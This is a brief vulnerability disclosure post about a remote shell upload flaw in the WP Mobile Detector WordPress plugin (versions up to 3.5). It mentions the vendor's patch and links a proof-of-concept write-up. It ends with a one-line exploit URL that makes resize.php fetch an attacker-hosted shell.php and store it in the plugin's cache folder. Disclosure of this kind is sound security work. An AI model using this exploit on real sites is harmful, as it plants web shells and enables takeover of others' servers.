WordPress WP Mobile Detector plugin versions 3.5 and below suffer from a remote shell upload vulnerability.
85f64637f7e3d070e1c1fb384164c477e46d51fa5c96abcd37721c75c40e3eff
Hello,
This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .Even Sucuri
has published one advisory on it.
I have wrote a Complete POC post:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple POC:
Go to [wordpress site
path].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to
your shell.php]
and it will get saved in directory
/wp-content/plugins/wp-mobile-detector/cache/shell.php
Warm Regards,
Aaditya Purani